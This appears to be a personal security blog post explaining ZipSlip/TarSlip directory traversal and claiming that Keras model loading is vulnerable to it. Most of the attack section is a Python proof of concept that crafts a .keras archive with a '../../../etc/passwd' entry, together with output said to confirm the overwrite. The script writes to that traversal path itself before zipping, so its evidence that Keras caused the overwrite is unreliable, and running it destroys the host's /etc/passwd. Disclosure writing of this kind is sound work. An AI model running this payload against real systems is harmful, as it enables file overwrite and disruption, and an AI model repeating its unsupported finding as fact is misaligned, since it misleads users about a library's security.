Understanding and Mitigating Zip/TarSlip Directory Traversal

SangharshaSangharsha
3 min read

Status : Duplicate

Understanding Zip/TarSlip Attacks

ZipSlip and TarSlip are well-known directory traversal vulnerabilities that occur when extracting archive files (ZIP, TAR, etc.) without proper path validation. These attacks exploit the ability to include relative paths (../../) inside archive filenames, allowing attackers to overwrite arbitrary files on the filesystem during extraction.

For example, a malicious ZIP archive might contain a file named ../../etc/passwd, and when extracted, it would overwrite the system's /etc/passwd file, leading to privilege escalation, denial of service, or even remote code execution (RCE) under certain conditions.

How Zip/TarSlip Works

  1. A ZIP or TAR archive is created with file entries containing directory traversal sequences (../../../).

  2. When a vulnerable application extracts this archive, it does not sanitize or validate the extracted file paths.

  3. As a result, files are written outside the intended extraction directory, potentially overwriting critical system files.

The Vulnerability in Keras Model Loading

While wondering what to search next, I stumbled upon an interesting behavior in Keras model loading. The .keras model file stored as ZIP archives are extracted without path validation, leading to an exploitable directory traversal vulnerability. Despite being flagged in some security scanners, it appears the underlying issue still exists and remains a major security risk. A vulnerability exists in Keras model loading, specifically in the keras_native module, where .keras model files—stored as ZIP archives—are extracted unsafely without checking file paths. This allows an attacker to craft a .keras model containing directory traversal sequences, leading to arbitrary file overwrite on the system.

How the Exploit Works

When a .keras model is loaded using keras.models.load_model(), Keras extracts the ZIP archive before verifying its contents. If a malicious .keras model includes a file with a path like ../../../etc/passwd, it will overwrite system files such as /etc/passwd upon extraction. Even though Keras may later fail due to missing config.json, but till then the damage is already done.

Proof-of-Concept (PoC)

After multiple attempts, I successfully developed a Python script that demonstrates this issue by generating a malicious .keras model and attempting to load it using Keras.

import keras
import zipfile
import os

def create_malicious_keras_model(zip_filename):
    os.makedirs("malicious", exist_ok=True)
    malicious_path = "malicious/../../../etc/passwd"
    with open(malicious_path, "w") as f:
        f.write("Overwritten by attacker!")
    with zipfile.ZipFile(zip_filename, "w") as zipf:
        zipf.write(malicious_path, "../../../etc/passwd")  
    print(f"Malicious model '{zip_filename}' created.")

def test_keras_loading(zip_filename):
    try:
        keras.models.load_model(zip_filename)  
        print("Keras loaded the model.")
    except Exception as e:
        print(f"Keras failed to load model: {e}")

zip_file = "malicious_model.keras"
create_malicious_keras_model(zip_file)
test_keras_loading(zip_file)

if os.path.exists("/etc/passwd"):
    with open("/etc/passwd", "r") as f:
        content = f.read()
        if "Overwritten by attacker!" in content:
            print("SEE SYSTEM FILE OVERWRITTEN! Keras extracted the model unsafely!")
        else:
            print("Something went wrong")

Observed Behavior

When executed in Google Colab or a vulnerable environment, the output confirmed the overwrite:

Malicious model 'malicious_model.keras' created.
Keras failed to load model: "There is no item named 'config.json' in the archive"
SEE SYSTEM FILE OVERWRITTEN! Keras extracted the model unsafely!

After running !cat /etc/passwd, then boom:

Overwritten by attacker!

Impact of the Vulnerability

  • Arbitrary File Overwrite: Attackers can overwrite critical system files, leading to denial of service or privilege escalation.

  • Potential for Remote Code Execution (RCE): If a cloud-based inference service automatically loads user-submitted .keras models, an attacker could plant malicious scripts leading to RCE.

  • Affects Any User Loading .keras Models: Anyone using keras.models.load_model() without verifying their model sources is at risk.

Final Thoughts

This vulnerability highlights the importance of safe file handling in machine learning frameworks. While .keras files may seem harmless, overlooking proper extraction security can lead to severe consequences. Until Keras implements a fix, users should only load .keras models from trusted sources and manually inspect archives before loading them. it's frustrating to see findings marked as "duplicate" when real-world risks still persist.

References:

0
Subscribe to my newsletter

Read articles from Sangharsha directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

Sangharsha
Sangharsha

Aspiring developer and security enthusiast.